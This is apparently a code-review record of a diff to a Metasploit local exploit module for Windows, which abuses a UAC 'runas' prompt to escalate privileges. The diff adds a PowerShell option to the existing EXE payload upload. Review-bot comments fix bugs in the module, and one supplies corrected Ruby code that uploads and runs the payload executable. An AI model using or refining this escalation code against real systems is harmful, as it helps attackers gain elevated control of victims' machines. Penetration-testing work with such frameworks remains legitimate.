diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 9e2b996c3c..163f62edde 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -7,12 +7,14 @@ require 'msf/core' require 'msf/core/exploit/exe' +require 'msf/core/exploit/powershell' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE include Post::File + include Exploit::Powershell def initialize(info={}) super( update_info( info, @@ -23,7 +25,10 @@ class Metasploit3 < Msf::Exploit::Local UAC settings. }, 'License' => MSF_LICENSE, - 'Author' => [ 'mubix' ], + 'Author' => [ + 'mubix', # Original technique + 'b00stfr3ak' # Added powershell option + ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], @@ -31,13 +36,14 @@ class Metasploit3 < Msf::Exploit::Local 'References' => [ [ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ] ], - 'DisclosureDate'=> "Jan 3 2012" + 'DisclosureDate'=> "Jan 3 2012", )) register_options([ OptString.new("FILENAME", [ false, "File name on disk"]), OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]), - OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]) + OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", false ]), + OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]), ]) end 
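Review bot: Flipping UPLOAD's default from true to false in the `register_options` hunk, while TECHNIQUE defaults to `'EXE'`, means a plain `run` no longer stages a payload, and judging from the later hunk the EXE path with UPLOAD=false now just prints an error and returns, so the module does nothing out of the box. The option text `"Should the payload be uploaded?"` also no longer says that the flag matters only for the EXE technique. Either keep the old default, `OptBool.new("UPLOAD", [ true, "Upload the EXE payload (TECHNIQUE=EXE only)", true ]),` or, if the intent is to make PowerShell the usual path, change TECHNIQUE's default instead and say so in the description. The `initialize` method this hunk sits in starts in an earlier hunk.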
@@ -71,31 +77,42 @@ class Metasploit3 < Msf::Exploit::Local # # Generate payload and random names for upload # - payload = generate_payload_exe - if datastore["FILENAME"] - payload_filename = datastore["FILENAME"] + if datastore["TECHNIQUE"] == "EXE" + if datastore["UPLOAD"] + exe_payload = generate_exe_payload_exe + + if datastore["FILENAME"] + payload_filename = datastore["FILENAME"] + else + payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" + end + + if datastore["PATH"] + payload_path = datastore["PATH"] + else + payload_path = session.fs.file.expand_path("%TEMP%") + end + + cmd_location = "#{payload_path}\\#{payload_filename}" + + if datastore["UPLOAD"] + print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...") + fd = session.fs.file.new(cmd_location, "wb") + fd.write(exe_payload) + fd.close + end + + session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5) + else + print_error("No Upload Path!") + return + end else - payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" + command = cmd_psh_payload(payload.encoded) + arguments = command.gsub("%COMSPEC% /B /C start powershell.exe ","") + session.railgun.shell32.ShellExecuteA(nil,"runas","powershell.exe","#{arguments}",nil,5) end - - if datastore["PATH"] - payload_path = datastore["PATH"] - else - payload_path = session.fs.file.expand_path("%TEMP%") - end - - cmd_location = "#{payload_path}\\#{payload_filename}" - - if datastore["UPLOAD"] - print_status("Uploading #{payload_filename} - #{payload.length} bytes to the filesystem...") - fd = session.fs.file.new(cmd_location, "wb") - fd.write(payload) - fd.close - end - - session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5) - end end
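Review bot: The EXE branch calls `generate_exe_payload_exe`, while the removed line it replaces called `generate_payload_exe` (the `Exploit::EXE` helper this module mixes in), so as written the default technique would raise NoMethodError before anything is uploaded; change it to `exe_payload = generate_payload_exe`. The branch also tests `datastore["UPLOAD"]` twice, and its new else prints `No Upload Path!` and returns, which both reports a misleading cause and drops the previous ability to execute an already-staged file at PATH\FILENAME with UPLOAD=false. The PSH branch obtains powershell's arguments by gsub'ing the hard-coded prefix `%COMSPEC% /B /C start powershell.exe ` out of whatever `cmd_psh_payload` returns; if that prefix ever differs the entire cmd string is handed to powershell.exe, so at minimum check `command.start_with?(prefix)` and `print_error`/`return` as the EXE branch does, or use a mixin helper that returns only the encoded-command arguments if one exists. Neither branch looks at ShellExecuteA's return value, so a declined UAC prompt goes unreported (pre-existing on the EXE path, new on the PSH path). Below is how I would restructure the EXE branch to restore the old UPLOAD=false behaviour and fix the helper name.
```ruby
    if datastore["TECHNIQUE"] == "EXE"
      payload_filename = datastore["FILENAME"] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
      payload_path = datastore["PATH"] || session.fs.file.expand_path("%TEMP%")
      cmd_location = "#{payload_path}\\#{payload_filename}"

      if datastore["UPLOAD"]
        exe_payload = generate_payload_exe  # was mistyped as generate_exe_payload_exe
        print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
        fd = session.fs.file.new(cmd_location, "wb")
        fd.write(exe_payload)
        fd.close
      else
        print_status("UPLOAD is false, executing existing file at #{cmd_location}")
      end

      session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
    else
      # … unchanged: PSH branch …
    end
```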